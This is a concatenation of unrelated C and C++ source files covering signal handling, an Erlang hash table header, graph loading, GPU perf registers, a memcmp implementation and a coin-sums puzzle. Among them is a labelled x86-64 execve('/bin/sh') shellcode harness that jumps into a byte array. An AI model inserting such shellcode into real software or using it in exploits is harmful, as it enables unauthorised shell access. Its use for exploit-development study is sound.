#define POLARITY_INVERSION_EXTCOMIN

/* Define POLARITY_INVERSION_EXTCOMIN_PAL_AUTO_TOGGLE if you want the PAL
 * (Platform Abstraction Layer interface) to automatically toggle the EXTCOMIN
 * pin.
 * If the PAL_TIMER_REPEAT function is defined, the EXTCOMIN toggling is
 * handled by a timer repeat system, therefore we must undefine
 * POLARITY_INVERSION_EXTCOMIN_PAL_AUTO_TOGGLE. */
#ifndef PAL_TIMER_REPEAT_FUNCTION
#define POLARITY_INVERSION_EXTCOMIN_PAL_AUTO_TOGGLE
#endif

#endif /* DISPLAYLS013B7DH03CONFIG_H */
/* \file * \author Chris Bradley * \brief This file contains system level routines. * * \section LICENSE * * Version: MPL 1.1/GPL 2.0/LGPL 2.1 * * The contents of this file are subject to the Mozilla Public License * Version 1.1 (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://www.mozilla.org/MPL/ * * Software distributed under the License is distributed on an "AS IS" * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the * License for the specific language governing rights and limitations * under the License. * * The Original Code is OpenCMISS * * The Initial Developer of the Original Code is University of Auckland, * Auckland, New Zealand, the University of Oxford, Oxford, United * Kingdom and King's College, London, United Kingdom. Portions created * by the University of Auckland, the University of Oxford and King's * College, London are Copyright (C) 2007-2010 by the University of * Auckland, the University of Oxford and King's College, London. * All Rights Reserved. * * Contributor(s): * * Alternatively, the contents of this file may be used under the terms of * either the GNU General Public License Version 2 or later (the "GPL"), or * the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), * in which case the provisions of the GPL or the LGPL are applicable instead * of those above. If you wish to allow use of your version of this file only * under the terms of either the GPL or the LGPL, and not to allow others to * use your version of this file under the terms of the MPL, indicate your * decision by deleting the provisions above and replace them with the notice * and other provisions required by the GPL or the LGPL. If you do not delete * the provisions above, a recipient may use your version of this file under * the terms of any one of the MPL, the GPL or the LGPL. 
* */ /* Included files */ #include <signal.h> #include <stdio.h> #include <stdlib.h> #include "cmiss.h" /* Type definitions */ /* Function prototypes */ void cmfe_ResetFatalHandler(void); void cmfe_SetFatalHandler(void); void cmfe_InitFatalHandler(void); /* Internal functions */ static void cmfe_FatalHandler(int sig #if defined (sun) ,siginfo_t *sip, ucontext_t *uap #else #ifndef __MINGW32__ ,int code #if defined(_AIX) ,struct sigcontext *sc #endif #endif #endif ); /* Static variables */ /* static sigjmp_buf jump_buffer; */ static struct sigaction fatal_sigaction; static struct sigaction old_SIGBUS_action; #ifdef SIGEMT static struct sigaction old_SIGEMT_action; #endif static struct sigaction old_SIGFPE_action; static struct sigaction old_SIGILL_action; static struct sigaction old_SIGINT_action; static struct sigaction old_SIGABRT_action; static struct sigaction old_SIGSEGV_action; static struct sigaction old_SIGTRAP_action; void cmfe_ResetFatalHandler() { #if defined (SIGBUS) if( 0 != sigaction(SIGBUS,&old_SIGBUS_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGBUS handler.\n"); } #endif /* defined (SIGBUS) */ #ifdef SIGEMT if( 0 != sigaction(SIGEMT,&old_SIGEMT_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGEMT handler.\n"); } #endif if( 0 != sigaction(SIGFPE,&old_SIGFPE_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGFPE handler.\n"); } if( 0 != sigaction(SIGILL,&old_SIGILL_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGILL handler.\n"); } if( 0 != sigaction(SIGINT,&old_SIGINT_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGINT handler.\n"); } if( 0 != sigaction(SIGABRT,&old_SIGABRT_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGABRT handler.\n"); } if( 0 != sigaction(SIGSEGV,&old_SIGSEGV_action,NULL) ) { fprintf(stderr,">>WARNING: Could not reset SIGSEGV handler.\n"); } #if defined (SIGTRAP) if( 0 != sigaction(SIGTRAP,&old_SIGTRAP_action,NULL) ) { 
fprintf(stderr,">>WARNING: Could not reset SIGTRAP handler.\n"); } #endif /* defined (SIGTRAP) */ } void cmfe_SetFatalHandler(void) { #if (defined (unix) || defined (_AIX)) && !defined(__MINGW32__) #if defined (SIGBUS) if( 0 != sigaction(SIGBUS,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: Could not set SIGBUS handler.\n"); } #endif /* defined (SIGBUS) */ #ifdef SIGEMT if( 0 != sigaction(SIGEMT,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGEMT handler.\n"); } #endif if( 0 != sigaction(SIGFPE,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGFPE handler.\n"); } if( 0 != sigaction(SIGILL,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGILL handler.\n"); } if( 0 != sigaction(SIGINT,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGINT handler.\n"); } if( 0 != sigaction(SIGABRT,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGABRT handler.\n"); } if( 0 != sigaction(SIGSEGV,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGSEGV handler.\n"); } #if defined (SIGTRAP) if( 0 != sigaction(SIGTRAP,&fatal_sigaction,NULL) ) { fprintf(stderr,">>WARNING: could not set SIGTRAP handler.\n"); } #endif /* defined (SIGTRAP) */ #endif /* defined (unix) || defined (_AIX) */ } static void cmfe_FatalHandler(int sig #if defined (sun) ,siginfo_t *sip, ucontext_t *uap #else #ifndef __MINGW32__ ,int code #if defined(_AIX) ,struct sigcontext *sc #endif #endif #endif ) { #if defined(_AIX) /* this from libxlf90.a provides a good description of what went wrong */ xl__sigdump(sig,code,sc); #else switch(sig) { #if defined (SIGBUS) case SIGBUS: { fprintf(stderr,">>FATAL ERROR: Bus error occurred.\n"); } break; #endif /* defined (SIGBUS) */ #if defined (SIGEMT) case SIGEMT: { fprintf(stderr,">>FATAL ERROR: EMT occurred.\n"); } break; #endif /* defined (SIGEMT) */ case SIGFPE: { fprintf(stderr,">>FATAL ERROR: Floating point execption occurred.\n"); } break; case 
SIGILL: { fprintf(stderr,">>FATAL ERROR: Illegal instruction occurred.\n"); } break; case SIGINT: { fprintf(stderr,">>FATAL ERROR: Interrupt occurred.\n"); } break; case SIGABRT: { fprintf(stderr,">>FATAL ERROR: Abort occurred.\n"); } break; case SIGSEGV: { fprintf(stderr,">>FATAL ERROR: Segment violation occurred.\n"); } break; #if defined (SIGTRAP) case SIGTRAP: { fprintf(stderr,">>FATAL ERROR: Trace trap occurred.\n"); } break; #endif /* defined (SIGTRAP) */ default: { fprintf(stderr,">>FATAL ERROR: Unknown signal %d occurred.\n" #ifndef __MINGW32__ ,code #endif ); } break; } #endif /* There is an issue with signal handling in a library such as OpenCMISS. The best option would be to jump back to where the user called an OpenCMISS routine and let them process the error if that is what they wish. This, however, would require setting the long jump buffer at each entry point to the OpenCMISS library. This could be done by modifying enters in opencmiss.F90 but may cause performance problems (probably not too bad as the major computations are inside the library rather than at the interface). For now just stop the program on a signal. */ /* siglongjmp(jump_buffer,sig); */ exit(sig); } void cmfe_InitFatalHandler(void) { fatal_sigaction.sa_flags = SA_NODEFER; fatal_sigaction.sa_handler = (void (*)(int))cmfe_FatalHandler; if( 0 != sigemptyset(&fatal_sigaction.sa_mask) ) { fprintf(stderr,">>WARNING: sigemptyset failed in CMISSInitFatalHandler.\n"); } #if defined (SIGBUS) sigaction(SIGBUS,NULL,&old_SIGBUS_action); #endif /* defined (SIGBUS) */ #if defined (SIGEMT) sigaction(SIGEMT,NULL,&old_SIGEMT_action); #endif /* defined (SIGEMT) */ sigaction(SIGFPE,NULL,&old_SIGFPE_action); sigaction(SIGILL,NULL,&old_SIGILL_action); sigaction(SIGINT,NULL,&old_SIGINT_action); sigaction(SIGABRT,NULL,&old_SIGABRT_action); sigaction(SIGSEGV,NULL,&old_SIGSEGV_action); #if defined (SIGTRAP) sigaction(SIGTRAP,NULL,&old_SIGTRAP_action); #endif /* defined (SIGTRAP) */ }
/*
 * %CopyrightBegin%
 *
 * Copyright Ericsson AB 1998-2020. All Rights Reserved.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 * %CopyrightEnd%
 */

#ifndef _DB_HASH_H
#define _DB_HASH_H

#include "erl_db_util.h" /* DbTerm & DbTableCommon */

/* Record of a slot whose elements were deleted while the table was fixed;
 * the slot index and two flag bits are packed into one UWord. */
typedef struct fixed_deletion {
    UWord slot : sizeof(UWord)*8 - 2;
    UWord all : 1;
    UWord trap : 1;
    struct fixed_deletion *next;
} FixedDeletion;

typedef Uint32 HashVal;

/* One stored object: bucket chain link, cached hash value and the term.
 * On 32-bit the hash and the pseudo_deleted flag share one word. */
typedef struct hash_db_term {
    struct hash_db_term* next;  /* next bucket */
#if SIZEOF_VOID_P == 4
    Uint32 hvalue : 31;         /* stored hash value */
    Uint32 pseudo_deleted : 1;
# define MAX_HASH_MASK (((Uint32)1 << 31)-1)
#elif SIZEOF_VOID_P == 8
    Uint32 hvalue;
    Uint32 pseudo_deleted;
# define MAX_HASH_MASK ((Uint32)(Sint32)-1)
#endif
    DbTerm dbterm;              /* The actual term */
} HashDbTerm;

/* Default number of fine-grained lock slots, overridable at build time. */
#ifdef ERTS_DB_HASH_LOCK_CNT
#define DB_HASH_LOCK_CNT ERTS_DB_HASH_LOCK_CNT
#else
#define DB_HASH_LOCK_CNT 64
#endif

/* A rwlock together with the counters it protects. */
typedef struct DbTableHashLockAndCounter {
    Sint nitems;
    Sint lck_stat;
    erts_rwmtx_t lck;
} DbTableHashLockAndCounter;

/* Lock slot padded to a cache line to avoid false sharing between locks. */
typedef struct db_table_hash_fine_lock_slot {
    union {
        DbTableHashLockAndCounter lck_ctr;
        byte _cache_line_alignment[ERTS_ALC_CACHE_LINE_ALIGN_SIZE(sizeof(DbTableHashLockAndCounter))];
    } u;
} DbTableHashFineLockSlot;

/* The hash (set/bag/duplicate_bag) ETS table representation. */
typedef struct db_table_hash {
    DbTableCommon common;
    erts_atomic_t lock_array_resize_state;

    /* szm, nactive, shrink_limit are write-protected by is_resizing or table write lock */
    erts_atomic_t szm;          /* current size mask. */
    erts_atomic_t nactive;      /* Number of "active" slots */
    erts_atomic_t shrink_limit; /* Shrink table when fewer objects than this */

    erts_atomic_t segtab;       /* The segment table (struct segment**) */
    struct segment* first_segtab[1];

    /* SMP: nslots and nsegs are protected by is_resizing or table write lock */
    int nlocks;                 /* Needs to be smaller or equal to nactive */
    int nslots;                 /* Total number of slots */
    int nsegs;                  /* Size of segment table */

    /* List of slots where elements have been deleted while table was fixed */
    erts_atomic_t fixdel;       /* (FixedDeletion*) */
    erts_atomic_t is_resizing;  /* grow/shrink in progress */
    DbTableHashFineLockSlot* locks;
} DbTableHash;

/* States of the lock-array resize operation. */
typedef enum {
    DB_HASH_LOCK_ARRAY_RESIZE_STATUS_NORMAL = 0,
    DB_HASH_LOCK_ARRAY_RESIZE_STATUS_GROW = 1,
    DB_HASH_LOCK_ARRAY_RESIZE_STATUS_SHRINK = 2
} db_hash_lock_array_resize_state;

/* To adapt number of locks if hash table with {write_concurrency, auto} */
void erl_db_hash_adapt_number_of_locks(DbTable* tb);

/*
** Function prototypes, looks the same (except the suffix) for all
** table types. The process is always an [in out] parameter.
*/
void db_initialize_hash(void);
SWord db_unfix_table_hash(DbTableHash *tb);
Uint db_kept_items_hash(DbTableHash *tb);

/* Interface for meta pid table */
int db_create_hash(Process *p, DbTable *tbl /* [in out] */);

int db_put_hash(DbTable *tbl, Eterm obj, int key_clash_fail,
                SWord* consumed_reds_p);

int db_get_hash(Process *p, DbTable *tbl, Eterm key, Eterm *ret);

int db_erase_hash(DbTable *tbl, Eterm key, Eterm *ret);

/* Bucket-chain statistics filled in by db_calc_stats_hash(). */
typedef struct {
    float avg_chain_len;
    float std_dev_chain_len;
    float std_dev_expected;
    int max_chain_len;
    int min_chain_len;
    int kept_items;
} DbHashStats;

void db_calc_stats_hash(DbTableHash* tb, DbHashStats*);
Eterm erts_ets_hash_sizeof_ext_segtab(void);
void
erts_db_foreach_thr_prgr_offheap_hash(void (*func)(ErlOffHeap *, void *),
                                      void *arg);

#ifdef ERTS_ENABLE_LOCK_COUNT
void erts_lcnt_enable_db_hash_lock_count(DbTableHash *tb, int enable);
#endif

#endif /* _DB_HASH_H */
/* ************************************************************************** */
/*                                                                            */
/*                                                        :::      ::::::::   */
/*   ft_memcmp.c                                        :+:      :+:    :+:   */
/*                                                    +:+ +:+         +:+     */
/*   By: anowak <anowak@student.42.fr>              +#+  +:+       +#+        */
/*                                                +#+#+#+#+#+   +#+           */
/*   Created: 2014/11/08 15:24:21 by anowak            #+#    #+#             */
/*   Updated: 2014/11/08 15:32:40 by anowak           ###   ########.fr       */
/*                                                                            */
/* ************************************************************************** */

#include "libft.h"

/*
** Compare the first n bytes of s1 and s2 as unsigned chars, like memcmp(3).
** Returns 0 if equal, otherwise the difference between the first pair of
** differing bytes (negative if s1 < s2, positive if s1 > s2).
**
** Fix: the index was declared `unsigned int`, which cannot cover the full
** range of the `size_t n` parameter on LP64 platforms — for n > UINT_MAX
** the loop condition wraps and the comparison stops short. Use size_t.
*/
int	ft_memcmp(const void *s1, const void *s2, size_t n)
{
	const unsigned char	*a;
	const unsigned char	*b;
	size_t				i;

	a = (const unsigned char *)s1;
	b = (const unsigned char *)s2;
	i = 0;
	while (i < n)
	{
		if (a[i] != b[i])
			return (a[i] - b[i]);
		i++;
	}
	return (0);
}
/*
 * SPDX-License-Identifier: MIT
 *
 * Copyright © 2018 Intel Corporation
 *
 * Autogenerated file by GPU Top : https://github.com/rib/gputop
 * DO NOT EDIT manually!
 */

#include <linux/sysfs.h>

#include "i915_drv.h"
#include "i915_oa_sklgt3.h"

/* Boolean ("B") counter register programming for the "test_oa" metric set.
 * Each entry is a (register, value) pair written verbatim by the OA core. */
static const struct i915_oa_reg b_counter_config_test_oa[] = {
	{ _MMIO(0x2740), 0x00000000 },
	{ _MMIO(0x2744), 0x00800000 },
	{ _MMIO(0x2714), 0xf0800000 },
	{ _MMIO(0x2710), 0x00000000 },
	{ _MMIO(0x2724), 0xf0800000 },
	{ _MMIO(0x2720), 0x00000000 },
	{ _MMIO(0x2770), 0x00000004 },
	{ _MMIO(0x2774), 0x00000000 },
	{ _MMIO(0x2778), 0x00000003 },
	{ _MMIO(0x277c), 0x00000000 },
	{ _MMIO(0x2780), 0x00000007 },
	{ _MMIO(0x2784), 0x00000000 },
	{ _MMIO(0x2788), 0x00100002 },
	{ _MMIO(0x278c), 0x0000fff7 },
	{ _MMIO(0x2790), 0x00100002 },
	{ _MMIO(0x2794), 0x0000ffcf },
	{ _MMIO(0x2798), 0x00100082 },
	{ _MMIO(0x279c), 0x0000ffef },
	{ _MMIO(0x27a0), 0x001000c2 },
	{ _MMIO(0x27a4), 0x0000ffe7 },
	{ _MMIO(0x27a8), 0x00100001 },
	{ _MMIO(0x27ac), 0x0000ffe7 },
};

/* No flexible-EU registers are programmed for this metric set. */
static const struct i915_oa_reg flex_eu_config_test_oa[] = {
};

/* MUX register programming for the "test_oa" metric set. */
static const struct i915_oa_reg mux_config_test_oa[] = {
	{ _MMIO(0x9840), 0x00000080 },
	{ _MMIO(0x9888), 0x11810000 },
	{ _MMIO(0x9888), 0x07810013 },
	{ _MMIO(0x9888), 0x1f810000 },
	{ _MMIO(0x9888), 0x1d810000 },
	{ _MMIO(0x9888), 0x1b930040 },
	{ _MMIO(0x9888), 0x07e54000 },
	{ _MMIO(0x9888), 0x1f908000 },
	{ _MMIO(0x9888), 0x11900000 },
	{ _MMIO(0x9888), 0x37900000 },
	{ _MMIO(0x9888), 0x53900000 },
	{ _MMIO(0x9888), 0x45900000 },
	{ _MMIO(0x9888), 0x33900000 },
};

/* sysfs "id" attribute callback: the test configuration is always id 1. */
static ssize_t
show_test_oa_id(struct device *kdev, struct device_attribute *attr, char *buf)
{
	return sprintf(buf, "1\n");
}

/* Register the SKL GT3 "test_oa" configuration (register tables, UUID and
 * the sysfs metric/id attributes) on the device's perf state. */
void
i915_perf_load_test_config_sklgt3(struct drm_i915_private *dev_priv)
{
	strlcpy(dev_priv->perf.oa.test_config.uuid,
		"2b985803-d3c9-4629-8a4f-634bfecba0e8",
		sizeof(dev_priv->perf.oa.test_config.uuid));
	dev_priv->perf.oa.test_config.id = 1;

	dev_priv->perf.oa.test_config.mux_regs = mux_config_test_oa;
	dev_priv->perf.oa.test_config.mux_regs_len = ARRAY_SIZE(mux_config_test_oa);

	dev_priv->perf.oa.test_config.b_counter_regs = b_counter_config_test_oa;
	dev_priv->perf.oa.test_config.b_counter_regs_len = ARRAY_SIZE(b_counter_config_test_oa);

	dev_priv->perf.oa.test_config.flex_regs = flex_eu_config_test_oa;
	dev_priv->perf.oa.test_config.flex_regs_len = ARRAY_SIZE(flex_eu_config_test_oa);

	dev_priv->perf.oa.test_config.sysfs_metric.name = "2b985803-d3c9-4629-8a4f-634bfecba0e8";
	dev_priv->perf.oa.test_config.sysfs_metric.attrs = dev_priv->perf.oa.test_config.attrs;

	dev_priv->perf.oa.test_config.attrs[0] = &dev_priv->perf.oa.test_config.sysfs_metric_id.attr;

	dev_priv->perf.oa.test_config.sysfs_metric_id.attr.name = "id";
	dev_priv->perf.oa.test_config.sysfs_metric_id.attr.mode = 0444;
	dev_priv->perf.oa.test_config.sysfs_metric_id.show = show_test_oa_id;
}
/*
 * This file belongs to the Galois project, a C++ library for exploiting
 * parallelism. The code is being released under the terms of the 3-Clause BSD
 * License (a copy is located in LICENSE.txt at the top-level directory).
 *
 * Copyright (C) 2018, The University of Texas at Austin. All rights reserved.
 * UNIVERSITY EXPRESSLY DISCLAIMS ANY AND ALL WARRANTIES CONCERNING THIS
 * SOFTWARE AND DOCUMENTATION, INCLUDING ANY WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR ANY PARTICULAR PURPOSE, NON-INFRINGEMENT AND WARRANTIES OF
 * PERFORMANCE, AND ANY WARRANTY THAT MIGHT OTHERWISE ARISE FROM COURSE OF
 * DEALING OR USAGE OF TRADE. NO WARRANTY IS EITHER EXPRESS OR IMPLIED WITH
 * RESPECT TO THE USE OF THE SOFTWARE OR DOCUMENTATION. Under no circumstances
 * shall University be liable for incidental, special, indirect, direct or
 * consequential damages or loss of profits, interruption of business, or
 * related expenses which may arise from use of Software or Documentation,
 * including but not limited to those resulting from defects in Software and/or
 * Documentation, or loss or inaccuracy of data of any kind.
 */

#ifndef KATANA_LIBGALOIS_KATANA_READGRAPH_H_
#define KATANA_LIBGALOIS_KATANA_READGRAPH_H_

#include "katana/Details.h"
#include "katana/FileGraph.h"
#include "katana/Galois.h"
#include "katana/Timer.h"
#include "katana/config.h"

namespace katana {

/**
 * Allocates and constructs a graph from a file. Tries to balance
 * memory evenly across system. Cannot be called during parallel
 * execution.
 */
template <typename GraphTy, typename... Args>
void readGraph(GraphTy& graph, Args&&... args) {
  // Dispatch on the graph's read_tag so each graph type picks the
  // appropriate overload below.
  typename GraphTy::read_tag tag;
  readGraphDispatch(graph, tag, std::forward<Args>(args)...);
}

// Default path, filename overload: memory-map the file and construct.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_default_graph_tag tag, const std::string& filename,
    const bool readUnweighted = false) {
  FileGraph f;
  if (readUnweighted) {
    //! If user specifies that the input graph is unweighted,
    //! the file graph also should be aware of this.
    //! Note that the application still could use the edge data array.
    f.fromFileInterleaved<void>(filename);
  } else {
    f.fromFileInterleaved<typename GraphTy::file_edge_data_type>(filename);
  }
  readGraphDispatch(graph, tag, f, readUnweighted);
}

// Per-thread functor: each thread constructs its share of the graph.
template <typename GraphTy>
struct ReadGraphConstructFrom {
  GraphTy& graph;
  FileGraph& f;
  bool readUnweighted = false;

  ReadGraphConstructFrom(GraphTy& g, FileGraph& _f) : graph(g), f(_f) {}
  ReadGraphConstructFrom(GraphTy& g, FileGraph& _f, bool _readUnweighted)
      : graph(g), f(_f), readUnweighted(_readUnweighted) {}

  void operator()(unsigned tid, unsigned total) {
    graph.constructFrom(f, tid, total, readUnweighted);
  }
};

// Default path, FileGraph overload: allocate, then construct in parallel.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_default_graph_tag, FileGraph& f,
    const bool readUnweighted = false) {
  graph.allocateFrom(f);

  ReadGraphConstructFrom<GraphTy> reader(graph, f, readUnweighted);
  katana::on_each(reader);
}

// Per-thread functor constructing only the nodes (aux-data path).
template <typename GraphTy, typename Aux>
struct ReadGraphConstructNodesFrom {
  GraphTy& graph;
  FileGraph& f;
  Aux& aux;

  ReadGraphConstructNodesFrom(GraphTy& g, FileGraph& _f, Aux& a)
      : graph(g), f(_f), aux(a) {}

  void operator()(unsigned tid, unsigned total) {
    graph.constructNodesFrom(f, tid, total, aux);
  }
};

// Per-thread functor constructing only the edges (aux-data path).
template <typename GraphTy, typename Aux>
struct ReadGraphConstructEdgesFrom {
  GraphTy& graph;
  FileGraph& f;
  Aux& aux;

  ReadGraphConstructEdgesFrom(GraphTy& g, FileGraph& _f, Aux& a)
      : graph(g), f(_f), aux(a) {}

  void operator()(unsigned tid, unsigned total) {
    graph.constructEdgesFrom(f, tid, total, aux);
  }
};

// Aux path, filename overload.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_with_aux_graph_tag tag, const std::string& filename) {
  FileGraph f;
  f.fromFileInterleaved<typename GraphTy::file_edge_data_type>(filename);
  readGraphDispatch(graph, tag, f);
}

// Aux path, FileGraph overload: allocate, build nodes, then edges.
template <typename GraphTy>
void readGraphDispatch(GraphTy& graph, read_with_aux_graph_tag, FileGraph& f) {
  typedef typename GraphTy::ReadGraphAuxData Aux;
  Aux aux;
  graph.allocateFrom(f, aux);

  ReadGraphConstructNodesFrom<GraphTy, Aux> nodeReader(graph, f, aux);
  katana::on_each(nodeReader);
  ReadGraphConstructEdgesFrom<GraphTy, Aux> edgeReader(graph, f, aux);
  katana::on_each(edgeReader);
}

// Per-thread functor constructing outgoing edges (aux-first path).
template <typename GraphTy, typename Aux>
struct ReadGraphConstructOutEdgesFrom {
  GraphTy& graph;
  FileGraph& f;
  Aux& aux;

  ReadGraphConstructOutEdgesFrom(GraphTy& g, FileGraph& _f, Aux& a)
      : graph(g), f(_f), aux(a) {}

  void operator()(unsigned tid, unsigned total) {
    graph.constructOutEdgesFrom(f, tid, total, aux);
  }
};

// Per-thread functor constructing incoming edges (aux-first path).
template <typename GraphTy, typename Aux>
struct ReadGraphConstructInEdgesFrom {
  GraphTy& graph;
  FileGraph& f;
  Aux& aux;

  ReadGraphConstructInEdgesFrom(GraphTy& g, FileGraph& _f, Aux& a)
      : graph(g), f(_f), aux(a) {}

  void operator()(unsigned tid, unsigned total) {
    graph.constructInEdgesFrom(f, tid, total, aux);
  }
};

// Aux-first path, FileGraph overload: aux data is heap-allocated because it
// may be large; phases are timed when `profile` is enabled.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_with_aux_first_graph_tag, FileGraph& f) {
  typedef typename GraphTy::ReadGraphAuxData Aux;
  constexpr static const bool profile = false;

  katana::CondStatTimer<profile> TAlloc("AllocateAux");
  TAlloc.start();
  Aux* auxPtr = new Aux;
  graph.allocateFrom(f, *auxPtr);
  TAlloc.stop();

  katana::CondStatTimer<profile> TNode("ConstructNode");
  TNode.start();
  ReadGraphConstructNodesFrom<GraphTy, Aux> nodeReader(graph, f, *auxPtr);
  katana::on_each(nodeReader);
  TNode.stop();

  katana::CondStatTimer<profile> TOutEdge("ConstructOutEdge");
  TOutEdge.start();
  ReadGraphConstructOutEdgesFrom<GraphTy, Aux> outEdgeReader(graph, f, *auxPtr);
  katana::on_each(outEdgeReader);
  TOutEdge.stop();

  katana::CondStatTimer<profile> TInEdge("ConstructInEdge");
  TInEdge.start();
  ReadGraphConstructInEdgesFrom<GraphTy, Aux> inEdgeReader(graph, f, *auxPtr);
  katana::on_each(inEdgeReader);
  TInEdge.stop();

  katana::CondStatTimer<profile> TDestruct("DestructAux");
  TDestruct.start();
  delete auxPtr;
  TDestruct.stop();
}

// Aux-first path, filename overload.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_with_aux_first_graph_tag tag,
    const std::string& filename) {
  FileGraph f;
  f.fromFileInterleaved<typename GraphTy::file_edge_data_type>(filename);
  readGraphDispatch(graph, tag, f);
}

// In/out graph from two files: out-graph from f1, in-graph from f2.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_lc_inout_graph_tag, const std::string& f1,
    const std::string& f2) {
  graph.createAsymmetric();

  typename GraphTy::out_graph_type::read_tag tag1;
  readGraphDispatch(graph, tag1, f1);

  typename GraphTy::in_graph_type::read_tag tag2;
  readGraphDispatch(graph.inGraph, tag2, f2);
}

// In/out graph from two FileGraphs.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_lc_inout_graph_tag, FileGraph& f1, FileGraph& f2) {
  graph.createAsymmetric();

  typename GraphTy::out_graph_type::read_tag tag1;
  readGraphDispatch(graph, tag1, f1);

  typename GraphTy::in_graph_type::read_tag tag2;
  readGraphDispatch(graph.inGraph, tag2, f2);
}

// Symmetric in/out graph from a single FileGraph.
template <typename GraphTy>
void readGraphDispatch(GraphTy& graph, read_lc_inout_graph_tag, FileGraph& f1) {
  typename GraphTy::out_graph_type::read_tag tag1;
  readGraphDispatch(graph, tag1, f1);
}

// Symmetric in/out graph from a single file.
template <typename GraphTy>
void readGraphDispatch(
    GraphTy& graph, read_lc_inout_graph_tag, const std::string& f1) {
  typename GraphTy::out_graph_type::read_tag tag1;
  readGraphDispatch(graph, tag1, f1);
}

} // namespace katana
#endif
/* Coin sums
 * Finds the possible ways to give 2 pounds
 * Konstantinos Ameranis 15.11.2013
 *
 * Fix: the original used `#define int long int`, which rewrites the keyword
 * `int` throughout the translation unit (undefined behavior in a hosted
 * implementation, and it turns `int main()` into the invalid `long main()`).
 * `long` is now spelled out explicitly, `main` keeps its standard signature,
 * and the hard-coded denomination count 8 is named.
 */
#include <stdio.h>

#define BALANCE 200

/* Number of coin denominations in `values`. */
#define NUM_VALUES 8

long coins(long balance, const long *values, int index);

int main() {
	/* UK coin denominations in pence, largest first. */
	const long values[NUM_VALUES] = {200, 100, 50, 20, 10, 5, 2, 1};
	printf("%ld\n", coins(BALANCE, values, 0));
	return 0;
}

/*
 * Count the ways to make `balance` using only denominations
 * values[index..NUM_VALUES-1]; restricting the start index avoids
 * counting permutations of the same coin multiset twice.
 * Returns 1 for an exact match, 0 when the balance goes negative.
 */
long coins(long balance, const long *values, int index) {
	if (0 == balance)
		return 1;
	if (balance < 0)
		return 0;
	long sum = 0;
	for (int i = index; i < NUM_VALUES; i++)
		sum += coins(balance - values[i], values, i);
	return sum;
}
#include <unistd.h>

/* Raw x86-64 machine code. From the byte sequence this appears to zero
 * rdx/rsi, build the string "/bin/sh" on the stack (shifting out the 0x11
 * filler bytes so the code itself contains no NUL), load the execve syscall
 * number into rax the same way, and execute `syscall` — i.e. a classic
 * execve("/bin/sh", NULL, NULL) shellcode test payload.
 * NOTE(review): presumably intentional for exploit-development practice;
 * confirm before shipping anywhere. */
char shellcode[] = "\x48\x31\xd2\x48\x31\xf6\x48\xbf"
                   "\x2f\x62\x69\x6e\x2f\x73\x68\x11"
                   "\x48\xc1\xe7\x08\x48\xc1\xef\x08"
                   "\x57\x48\x89\xe7\x48\xb8\x3b\x11"
                   "\x11\x11\x11\x11\x11\x11\x48\xc1"
                   "\xe0\x38\x48\xc1\xe8\x38\x0f\x05";

/* Jump into the byte array as if it were code. On systems with a
 * non-executable data segment (NX/DEP, the default) this will fault unless
 * the binary is built with an executable stack/data segment
 * (e.g. gcc -z execstack) — TODO confirm the intended build flags. */
int main(int argc, char ** argv)
{
	void (*fp)();
	/* Cast the data pointer to a function pointer; this is the whole
	 * point of the harness, not an accident. */
	fp = (void(*)())shellcode;
	(void)(*fp)();
	return 0;
}
// Copyright (C) 2002-2012 Nikolaus Gebhardt
// This file is part of the "Irrlicht Engine".
// For conditions of distribution and use, see copyright notice in irrlicht.h

#ifndef __E_MATERIAL_TYPES_H_INCLUDED__
#define __E_MATERIAL_TYPES_H_INCLUDED__

namespace irr
{
namespace video
{

	//! Abstracted and easy to use fixed function/programmable pipeline material modes.
	enum E_MATERIAL_TYPE
	{
		//! Standard solid material.
		/** Only first texture is used, which is supposed to be the
		diffuse material. */
		EMT_SOLID = 0,

		//! Solid material with 2 texture layers.
		/** The second is blended onto the first using the alpha value
		of the vertex colors. This material is currently not implemented
		in OpenGL. */
		EMT_SOLID_2_LAYER,

		//! Material type with standard lightmap technique
		/** There should be 2 textures: The first texture layer is a
		diffuse map, the second is a light map. Dynamic light is
		ignored. */
		EMT_LIGHTMAP,

		//! Material type with lightmap technique like EMT_LIGHTMAP.
		/** But lightmap and diffuse texture are added instead of
		modulated. */
		EMT_LIGHTMAP_ADD,

		//! Material type with standard lightmap technique
		/** There should be 2 textures: The first texture layer is a
		diffuse map, the second is a light map. Dynamic light is
		ignored. The texture colors are effectively multiplied by 2
		for brightening. Like known in DirectX as D3DTOP_MODULATE2X. */
		EMT_LIGHTMAP_M2,

		//! Material type with standard lightmap technique
		/** There should be 2 textures: The first texture layer is a
		diffuse map, the second is a light map. Dynamic light is
